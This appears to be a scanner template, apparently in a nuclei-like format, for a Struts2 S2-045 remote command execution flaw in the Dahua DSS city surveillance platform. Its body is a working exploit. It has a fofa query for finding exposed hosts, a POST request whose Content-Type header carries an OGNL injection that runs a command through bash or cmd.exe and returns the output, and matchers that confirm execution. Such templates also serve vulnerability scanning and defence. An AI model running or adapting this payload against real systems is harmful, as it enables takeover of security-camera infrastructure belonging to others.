## id: VEID-2024-0410
## name: 大华DSS城市安防监控平台Struct2-045命令执行漏洞
## author: hack007x
## severity: critical
## tags: veid,rce,veid2024
## description: 大华DSS城市安防监控平台存在任意命令执行漏洞。
## fofa-query: app="dahua-DSS"
## verification: true

#$ payload = ifconfig | ipconfig

POST /admin/login_login.action HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{payload}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}


#@ stop_scan: true
#@ condition: and
#@ matcher: body matches /inet addr:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/ || (body contains "Windows IP" && body contains "子网掩码")
#@ matcher: status_code == 200





# @VEIL-STAMP: 25cc7d40536a04316fda73821dcbf791b154707f6b46aa48a2646474563f23da
